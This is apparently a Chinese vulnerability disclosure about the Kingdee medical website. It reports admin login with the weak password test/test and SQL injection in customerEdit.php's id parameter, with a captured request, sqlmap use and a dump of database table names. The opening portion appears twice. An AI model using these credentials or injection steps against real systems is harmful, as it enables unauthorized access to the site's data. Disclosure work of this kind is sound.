### 简要描述: 还是TMD弱口令 ### 详细说明: 站点:金蝶医疗: ``` http://yiliao.kingdee.com ``` 后台直接加个admin就是了,存在弱口令,test/test 进入后台。 [<img src="https://images.seebug.org/upload/201310/162030138b08fcf3b716c07be837aed244835725.jpg" alt="houtai.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/162030138b08fcf3b716c07be837aed244835725.jpg) 后台的上传是FCK,但是关键的type=Flash居然创建不了文件夹,what the fuck! 然后随便点击一个编辑新闻的连接。 http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 id存在注射,and 1=1正常 and 1=2 错误。 带上cookies,sqlmap跑一下。 ``` GET http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: yiliao.kingdee.com Pragma: no-cache Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1381922240; PHPSESSID=6d6a994e91f280ce4c4d1a3ebdaa93a2 ``` 肯定是注入了。 [<img...
### 简要描述: 还是TMD弱口令 ### 详细说明: 站点:金蝶医疗: ``` http://yiliao.kingdee.com ``` 后台直接加个admin就是了,存在弱口令,test/test 进入后台。 [<img src="https://images.seebug.org/upload/201310/162030138b08fcf3b716c07be837aed244835725.jpg" alt="houtai.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/162030138b08fcf3b716c07be837aed244835725.jpg) 后台的上传是FCK,但是关键的type=Flash居然创建不了文件夹,what the fuck! 然后随便点击一个编辑新闻的连接。 http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 id存在注射,and 1=1正常 and 1=2 错误。 带上cookies,sqlmap跑一下。 ``` GET http://yiliao.kingdee.com/admin/customerEdit.php?id=3&types=3 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: zh-CN User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: yiliao.kingdee.com Pragma: no-cache Cookie: Hm_lvt_aff7fbe8fcb98b060541077cc76465f2=1381922240; PHPSESSID=6d6a994e91f280ce4c4d1a3ebdaa93a2 ``` 肯定是注入了。 [<img src="https://images.seebug.org/upload/201310/162032078abc9301f3e83078dc0e9c844221932c.jpg" alt="SQL.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201310/162032078abc9301f3e83078dc0e9c844221932c.jpg) 然后呢。当前的数据库。 ``` current database: 'kingdee.456cn.com' ``` 当前数据库的表。 ``` Database: `kingdee.456cn.com` [9 tables] +----------------+ | kd_activity | | kd_admins | | kd_contents | | kd_customer | | kd_customerimg | | kd_indexad | | kd_jobs | | kd_joins | | kd_news | +----------------+ ``` Over ### 漏洞证明: 见详细说明。 审核人员顺带把http://www.wooyun.org/bugs/wooyun-2013-038500/trace/6f7db3fd650bda4190780ce3666beb0c 帮我审核一下,顺带把这句删除,谢谢,辛苦思密达!
